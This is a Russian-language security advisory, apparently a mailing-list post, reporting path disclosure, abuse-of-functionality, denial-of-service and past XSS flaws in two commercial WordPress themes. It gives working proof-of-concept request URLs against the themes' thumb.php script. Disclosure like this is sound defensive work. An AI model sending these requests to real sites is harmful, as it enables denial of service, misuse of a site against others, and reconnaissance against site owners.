SecurityvulnsSECURITYVULNS:DOC:26099Уязвимости в темах Live Wire 2.0 и Live Wire Style для WordPress
Здравствуйте 3APA3A!
Сообщаю вам о найденных мною Cross-Site Scripting, Full path disclosure, Abuse of Functionality и Denial of Service уязвимостях в темах
Live Wire 2.0 и Live Wire Style для WordPress. Это ещё две темы, которые вместе с Live Wire Edition входят в серию Live Wire. Это
коммерческие шаблоны для WP.
XSS (WASC-08):
Full path disclosure (WASC-13):
http://site/wp-content/themes/livewire/thumb.php?src=jpg
http://site/wp-content/themes/livewire/thumb.php?src=http://site/page.png&h=1&w=1111111
http://site/wp-content/themes/livewire/thumb.php?src=http://site/page.png&h=1111111&w=1
http://site/wp-content/themes/livewire/
А также ещё 30 php-скриптов шаблона в папке /livewire/ и всех подпапках.
Abuse of Functionality (WASC-42):
http://site/wp-content/themes/livewire/thumb.php?src=http://site&h=1&w=1
DoS (WASC-10):
http://site/wp-content/themes/livewire/thumb.php?src=http://site/big_file&h=1&w=1
О подобных AoF и DoS уязвимостях я писал в статье Использование сайтов для атаки на другие сайты (http://websecurity.com.ua/4322/).
Кроме папки /livewire/, данные темы также могут размещаться в папках /livewire-dev/ и /livewire-package/ (это пакет, который включает все
три темы Live Wire серии).
Уязвимы Live Wire 2.0 и Live Wire Style версия 2.3.1 и предыдущие версии. XSS возможна лишь в старых версиях шаблона. После моего
уведомления, разработчик исправил Abuse of Functionality, DoS и некоторые FPD, но всё ещё осталось много неисправленных FPD.
Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/4907/
Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua